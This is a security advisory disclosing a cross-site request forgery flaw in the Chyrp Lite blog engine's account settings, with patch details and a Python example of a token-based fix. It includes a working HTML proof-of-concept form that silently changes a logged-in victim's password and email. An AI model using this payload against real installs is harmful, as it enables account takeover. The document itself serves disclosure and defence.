Security Advisory – Cross Site Request Forgery in Chyrp Lite

Product: Chyrp Lite
Vendor: Open source community
Version: 2016.04 “Lago” and earlier
Category: Cross site request forgery (CSRF)
Vendor Notified: 2017-01-05
Patched: 2017-01-06
Disclosed: 2017-03-06
Researcher(s): Carl Pearson
CVE: CVE-2017-1000008

A cross-site request forgery (CSRF) vulnerability exists in the user properties (account settings) function of the Chyrp Lite blog engine. An unauthenticated remote attacker can exploit the vulnerability by tricking an authenticated user into visiting a web page under the attacker's control; the victim's browser then submits the settings form with the victim's session cookie attached.

Proof of Concept
Example HTML attack form:

<!-- The form submits when this button is clicked. -->
<button onclick="document.csrf_form.submit()">Click to run</button>
<!-- Edit the 'action' attribute to reflect the IP address or hostname of the victim's Chyrp install. -->
<form name="csrf_form" id="csrf_form" method="POST" action="http://[host]/?action=controls">
	<input class="text" type="text" name="login" value="user" id="login" disabled="disabled"/>
	<input type="text" name="full_name" value="" id="full_name" tabindex="1"/>
	<input type="text" name="email" value="" id="email" tabindex="1"/>
	<input type="text" name="website" value="" id="website" tabindex="1"/>
	<input type="password" name="new_password1" value="apple" id="new_password1"/>
	<input type="password" name="new_password2" value="apple" id="new_password2"/>
</form>

If successful, an attacker can arbitrarily change the user’s password, email, and username to any desired values.

Chyrp Lite version 2017.01 “Swainson” patches this issue. Updating any existing Chyrp Lite installs is recommended.
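The fix for this class of bug is the synchronizer token pattern: the settings form carries a secret, per-session token that a page on another origin cannot read, and the server rejects any POST that does not present it. The following is an added illustration written for this advisory, not Chyrp Lite's own code (Chyrp Lite is PHP; Python is used here so the logic can be run and checked stand-alone). The `Request` class, the in-memory `SESSIONS` store, the `?action=controls` stand-ins and the sample values are constructed for the example. It replays the forged POST from the proof of concept against an unpatched handler and a token-checking handler, and shows that a captured legitimate request cannot be replayed once the token rotates.

```python
import hmac
import secrets
from dataclasses import dataclass

# Constructed in-memory session store: session id -> session data.
# Stands in for the server's real session backend.
SESSIONS: dict = {}


@dataclass
class Request:
    """Constructed stand-in for an HTTP POST to '?action=controls'."""
    cookies: dict
    form: dict


def new_session(login: str) -> str:
    """Create a logged-in session and return its cookie value."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {"login": login, "email": "", "password": "old-secret"}
    return sid


def issue_csrf_token(sid: str) -> str:
    """Synchronizer token: random value stored server-side in the session and
    embedded as a hidden field in every legitimate settings form."""
    token = secrets.token_urlsafe(32)
    SESSIONS[sid]["csrf_token"] = token
    return token


def _apply(session: dict, form: dict) -> bool:
    """Apply the profile update; the two password fields must match."""
    if form.get("new_password1") != form.get("new_password2"):
        return False
    if form.get("email"):
        session["email"] = form["email"]
    if form.get("new_password1"):
        session["password"] = form["new_password1"]
    return True


def controls_vulnerable(req: Request) -> bool:
    """Unpatched behaviour: any POST carrying a valid session cookie is honoured,
    so a cross-origin form like the PoC above succeeds."""
    session = SESSIONS.get(req.cookies.get("session"))
    if session is None:
        return False
    return _apply(session, req.form)


def controls_patched(req: Request) -> bool:
    """Hardened behaviour: the POST must also carry the per-session token.
    A form hosted on an attacker's origin cannot read the victim's token."""
    sid = req.cookies.get("session")
    session = SESSIONS.get(sid)
    if session is None:
        return False
    expected = session.get("csrf_token", "")
    supplied = req.form.get("csrf_token", "")
    # Constant-time comparison; encode so non-ASCII input cannot raise.
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return False
    issue_csrf_token(sid)  # rotate so a captured token cannot be replayed
    return _apply(session, req.form)


def demo() -> tuple:
    """Returns (forged accepted by vulnerable handler,
                forged accepted by patched handler,
                legitimate accepted by patched handler,
                replay of legitimate request accepted by patched handler)."""
    sid = new_session("user")
    token = issue_csrf_token(sid)
    # Forged request: the browser attaches the cookie automatically, but the
    # attacker's page has no way to include the victim's csrf_token.
    forged = Request(cookies={"session": sid},
                     form={"email": "attacker@example.invalid",
                           "new_password1": "apple", "new_password2": "apple"})
    vuln_ok = controls_vulnerable(forged)
    patched_forged_ok = controls_patched(forged)
    # Legitimate request rendered from the real form, carrying the token.
    legit = Request(cookies={"session": sid},
                    form={"csrf_token": token, "email": "user@example.invalid",
                          "new_password1": "", "new_password2": ""})
    patched_legit_ok = controls_patched(legit)
    replay_ok = controls_patched(legit)  # same token again, after rotation
    return (vuln_ok, patched_forged_ok, patched_legit_ok, replay_ok)


if __name__ == "__main__":
    print(demo())  # expected: (True, False, True, False)
```

The token is the control that closes the hole on the server; `SameSite` cookie attributes and origin/referer checks are useful defence in depth but should not be relied on alone, since they depend on client behaviour rather than on something the server verifies for every request.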

Project home:
v2017.01 release notes:
OWASP CSRF overview:

Edit 7/13/17: CVE identifier added.
